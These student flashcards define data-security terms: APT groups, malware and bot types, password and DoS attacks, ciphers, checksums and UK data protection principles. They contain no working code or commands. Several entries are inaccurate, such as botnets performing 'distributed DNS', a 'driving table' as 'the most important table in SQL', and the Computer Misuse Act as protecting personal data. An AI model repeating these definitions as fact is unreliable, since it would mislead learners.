Data Security and Integrity Processes Flashcards
Access Levels
allowing different users to have access to different data, such as giving some people Read Only access, or allowing some people to access more data than others
APT
Advanced Persistent Threat
a set of stealthy and continuous computer hacking processes, often orchestrated by humans targeting a specific entity, usually organisations and/or nations for business or political nations
APT1
a professional cyber espionage group in China
APT28
Fancybear
state sponsored malware attacks for information gathering for foreign governments
APT29
Hamertoss
a malware backdoor using Twitter and GitHub originating in Russia
Adware
not dangerous in its own right, but may contains links to other malware, such as viruses and key loggers
Attack Vectors
describes direction of attack
Backdoor
built into a computer program that allows someone to bypass any security to get to it
Back-Up of Servers
this should be done off-site to avoid back-ups being destroyed in situations such as fires or floods that also destroy the originals, and the location should be on a need-to-know basis
Baudot Code
a 5-digit binary number used in the Vernam cipher to encrypt data
Behavioural Identifiers
consists of the exceptional ways in which individuals act, including identification of typing patterns, gait and other gestures; some of these behavioural identifiers can be utilised for constant validation
Bespoke Tools
specifically developed tools to target known vulnerabilities or poorly designed software
Biometric Exposures
high-tech cameras and other devices support usage of biometrics, but can also be used by attackers; people do not cover or hide their physical and behavioural features, therefore, attacks can happen by simply capturing biometric data from people without their permission or knowledge
Biometric Template
is compared to the data storage; data is encrypted for security measures
Blagging
the act of convincing someone else to make them directly give away information such as passwords
Bot Activity
software application that runs automated tasks on the Internet, usually with the intent to imitate human activity
Anonymisation Proxy
a tool that attempts to make activity on the Internet untraceable by acting as an intermediary and privacy shield between a client computer and the rest of the Internet
CAPTCHA Solving Zombie
bots that can solve CAPTCHA
Click Fraud Zombie
the practice of artificially inflating traffic statistics for online advertisements
DoS Extortion Zombie
a bot that carries out DoS
Spam Zombie
a bot that sends out spam
Botnet
where an entire network becomes infected with malware and are controlled as a group, eg to perform distributed DNS
Browser Script Attack
a type of injection attack in which malicious scripts are injected into otherwise benign and trusted websites
Brute Force Attack
where hacker have multiple guesses in quick succession at your password until they eventually guess it correctly
Caesar Cipher
a substitution cipher that involves substituting letters in a message for other letters, symbols and characters. It can be broken using brute-force attacks or letter frequency attacks, but it isn’t very secure as patterns in the text are still persevered, the most frequently used letters will appear in the same places as the plaintext’s most frequently used letters, the number of possible keys is too small and the same shift is likely to be used for each message
Cartesian Product
where the relationship between elements in two different sets are introduced
Check Digit
an extra digit or character added to the end of a long code. It is computed by applying an algorithm to the other digits. When the long code is entered, the check digit is calculated and compared to the check digit at the end of the code
Checksums
a simple error-detection scheme. Each transmitted package is accompanied by a numerical value based on the number of set bits in the message. The receiving station then applies the same formula to the message and checks to make sure the numerical value is the same. If not, the receiver can assume than an error has occurred and it will ask the sending computer to re-send the package
Commodity Tools
freely available tools and scripts on the internet including specialist toos for vulnerability scanning or penetration testing
Computer Misuse Act
legislation that protects personal data held by organisations from hackers, making unauthorised access to computers, unauthorised access to computer data and unauthorised modification of data illegal
Contingency Planning
planning for disaster
Cyberattack
attacks on computers or networks that use various types of malware
Survey
researching the target and reviewing available information to identify potential vulnerabilities and possible lines of attack
Delivery
crafting an attack to exploit a vulnerability and delivering it to the target
Breach
exploiting a vulnerability to gain access to information in order to create some negative impact
Attack
developing the attack to achieve the intention
Data Protection Act 2018
laws about personal data held by an organisation, stating that personal data must be kept up-to-date and accurate, not held for any longer than is necessary, that individuals relating to that information can access it and correct it and that they can receive compensation if the law is not followed regarding their data
First Data Protection Principle
processing of personal data for any of the law enforcement purposes must be lawful and fair
Second Data Protection Principle
the law enforcement purpose for which personal data is collected on any occasion must be specified, explicit and legitimate, and personal data so collected must not be processed in a manner that is incompatible with the purpose for which it was collected
Third Data Protection Principle
personal data processed for any of the law enforcement purposes must be adequate, relevant and not excessive in relation to the purpose for which it is processed
Fourth Data Protection Principle
personal data processed for any of the law enforcement purposes must be adequate, relevant and, where necessary, kept up to date, and every reasonable step must be taken to ensure that personal data that is inaccurate, having regard to the las enforcement purpose for which it is processed, is erased and rectified without delay
Fifth Data Protection Principle
personal data processed for any law enforcement purposes must be kept for no longer than is necessary for the purposes for which it is processed
Sixth Data Protection Principle
personal data processed for any of the law enforcement purposes must be so processed in a manner that ensures appropriate security of the personal data, using appropriate technical and organisational measures
Decision Process
makes use of matching outputs
Decryption
the process of recovering original data, known as plaintext
DoS Attack
Denial of Service Attack
attempt to make your website and servers unavailable to legitimate users by swamping a system with fake requests, usually in an attempt to exhaust server resources
Dictionary Attack
where the hacker use a file containing every word in the dictionary to guess your password
Disaster Recovery
plans to recovery after disaster
Disposal of Files
allows better file integrity
Distributed DoS
DoS involving may networks, possibly because several networks are all attacking at once, or because several networks are all being attacked at once
Driving Table
the most important table in SQL
Eavesdropping
where hackers attempt to intercept keys in order to decode encrypted messages